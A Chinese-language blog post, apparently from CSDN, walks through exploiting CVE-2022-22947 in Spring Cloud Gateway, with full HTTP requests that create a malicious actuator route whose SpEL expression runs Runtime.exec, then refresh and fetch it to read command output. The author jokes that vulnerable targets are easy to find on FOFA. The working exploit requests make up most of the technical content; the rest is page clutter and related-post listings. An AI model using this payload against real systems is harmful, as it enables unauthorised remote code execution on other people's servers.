论Spring系列之CVE-2022-22947

已于 2022-06-27 10:46:47 修改
阅读量1.1k 收藏 1
点赞数
文章标签: web安全
于 2022-06-24 15:45:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51721627/article/details/125446179
版权

安全学又学不会,只能送送外卖补贴家用这样子

Spring依旧在发力,今年三月份爆出的CVE-2022-22947代码执行漏洞又要杀疯了,fofa上一搜一个准(滑稽)

一、信息收集

还是用到老朋友脚本扫一扫,看看目标网页是否存在Spring Boot信息泄露问题

0c546d7727b945dfbf3d760ac08d897f.png

首先要抓包在/actuator/gateway/routes目录下抓包创建一条包含恶意请求的路由信息,放到Repeater。这里只能做参考,实操根据环境改变,例如可能要添加content-type,名称可以自己自由发挥,这里我用了test。

POST /actuator/gateway/routes/test HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 309

{
  "id": "test",
 "filters": [{
"name": "AddResponseHeader",
"args": {
  "name": "Result",
  "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"ls\"}).getInputStream()))}"
}
  }],
  "uri": "http://example.com"
}

如果能够正常创建,服务器要给回一个201状态的包,如果返回如图上的状态,证明创建成功,就可以进行下一步

69ed1e6880504b1c8e458e96d0a98802.png

创建成功后,可以简单理解成,我们的构造的恶意代码已经躺在对方的服务器上,只需要你去刷新,并且去访问该页面就可以触发我们的恶意代码,以下代码和刚才创建路由的基本一致,只需要修改POST请求的页面,改成/actuaor/gateway/refresh,刷新信息

POST /actuator/gateway/refresh HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 309

{
  "id": "test",
 "filters": [{
"name": "AddResponseHeader",
"args": {
  "name": "Result",
  "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"ls\"}).getInputStream()))}"
}
  }],
  "uri": "http://example.com"
}

 最后直接GET访问我们刚才创建好的路由,hostname:port/actuator/gateway/routes/创建路由的名称(我这里用的是test)

完毕,下一个

Skr11lex
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
GitHub热门开源项目-2024版
生活在别处
07-15 479
前台商城系统包含首页门户、商品推荐、商品搜索、商品展示、购物车、订单流程、会员中心、客户服务、帮助中心等模块。中英文敏感词、语言检测、中外手机/电话归属地/运营商查询、名字推断性别、手机号抽取、身份证抽取、邮箱抽取、中日文人名库、中文缩写库、拆字词典、词汇情感值、停用词、反动词表、暴恐词表、繁简体转换、英文模拟中文发音、汪峰歌词生成器、职业名称词库、同义词库、反义词库、否定词库、汽…互联网 Java 工程师进阶知识完全扫盲:涵盖高并发、分布式、高可用、微服务、海量数据处理等领域知识。各取所需,高效学习。
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 673
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
springboot gateway命令执行漏洞复现(CVE-2022-22947)+内存马
qq_61860998的博客
06-22 790
springboot gateway命令执行+内存马
总结下几个有漏洞第三方插件
weixin_44650410的博客
07-17 2087
总价中间件漏洞
android安卓源码海量项目合集打包-1
热门推荐
chenhao0568的专栏
06-11 13万+
下载地址 最后更新共计113个分类5177套源码29.2 GB。 卷 新加卷 的文件夹 PATH 列表 卷序列号为 00000200 5E7A:7F30 F:. ├─前台界面 │ ├─3D标签云卡片热门 │ │ Android TagCloudView云标签的灵活运用.rar │ │ Android 实现 标签 拖动 改变位置.rar │ │ android 流式布局和热门标签.zip │ │ ...
Spring源码之Web MVC framework官方文档翻译
AnY11的专栏
01-17 1088
22.1 Introduction to Spring Web MVC framework Spring Web model-view-controller (MVC)框架是围绕一个DispatcherServlet设计的,该DispatcherServlet将请求分派给处理程序,具有可配置的处理程序映射、视图解析、地区、时区和主题解析以及对上传文件的支持。默认处理程序基于@Controller...
新的分享之路开启,感谢您的陪伴
杨秀璋的专栏
10-17 5046
分享之初 新学期即将到来之时,我开启了新的分享之路,第一次尝试在微信公众号上分享原创知识。起初,我一直是拒绝的,因为读博异常忙碌,哪有时间去经营一个新的学习天地,并且经过十年的CDSN分享,慢慢养成了力争每一篇文章都是干货,都对得起读者的喜欢。我期望的是毕业之后,再去开启一个叙述娜璋宝一家的故事,漫漫人生路,用文字和图片去撰写程序的世界,去诉说这个多姿多彩的生活。 十年啊,过得真快。人生的八分之一就这么离去了,真心感谢CSDN和博友们这些年的陪伴和鼓励,500篇文章,60个专栏,近1000万字的文字和代码,
SpringSpring Framework Reference Documentation中文版18
kingdz618的博客
05-16 1270
Part VI. The Web   This part of the reference documentation covers Spring Framework’s support for the presentation tier (and specifically web-based presentation tiers) including support for WebSocke
[当人工智能遇上安全] 2.清华张超老师 - GreyOne: Discover Vulnerabilities with Data Flow Sensitive Fuzzing
杨秀璋的专栏
09-18 6337
前一篇文章将带领大家复习AI对抗样本技术,包括对抗样本白皮书、从NLP视角看机器学习模型安全、对抗文本TextBugger,并总结大佬们的分享。这篇文章将分享张超大佬的两次报告,第一篇是学术论文相关的“数据流敏感的漏洞挖掘方法”,第二篇是安全攻防实战相关的“智能软件漏洞攻防”。这些大佬是真的值得我们去学习,献上小弟的膝盖。基础性入门文章,希望对您有所帮助。
[论文阅读] (03) 清华张超老师 - GreyOne: Discover Vulnerabilities with Data Flow Sensitive Fuzzing
杨秀璋的专栏
08-06 1万+
《秀璋带你读论文》系列主要是督促自己阅读优秀论文及听取学术讲座,并分享给大家,希望您喜欢。模糊测试近年来成为安全研究人员的必备的漏洞挖掘工具,是近年来漏洞披露数量爆发的重要推手。然而,模糊测试工具在种子生成、选择、变异、测试、评估、反馈等多个环节都存在一定的盲目性和随机性,其漏洞挖掘效率存在较大提升空间。我们通过分析经典模糊测试工具AFL的实现原理,找到了若干个制约其效率的瓶颈所在,包括数据流不敏感等,并针对性地提出了改进方案GreyOne(USENIX Sec'20)。本次报告将与大家探讨这一方案。
CVE-2022-22947-Spring-Cloud-Gateway 内存马POC
03-29
Spring官方博客发布了一篇关于Spring Cloud Gateway的CVE报告,据公告描述,当启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而...
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
春秋云境 CVE-2022-4230 夺旗
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞:CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
web安全基础学习
m0_71332744的博客
07-31 316
记录学习的原理,少有实操持续更新
web安全之简要sql注入
最新发布
weixin_73185660的博客
08-01 903
举例:select * from users where id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='这里写数据库名称'如果是mysql5.0以上,则存在information_schema,其中存储所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或列名信息。如果是1=1,那么就是真且真,结果为真。
《计算机网络》(第8版)第7章 网络安全 复习笔记
m0_70617423的博客
07-29 1014
网络安全问题概述 两类密码体制 数字签名 鉴别 密钥分配 互联网使用的安全协议 系统安全:防火墙与入侵检测
SpringCloud Gateway CVE-2022-22947漏洞详解
"SpringCloud Gateway 漏洞分析 (CVE-2022-22947) 文档主要探讨了SpringCloud Gateway中的安全漏洞及其分析。文档提到了SpringCloud Gateway作为Spring提供的微服务框架的一部分,它在第一代zuul的基础上提供了更好...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值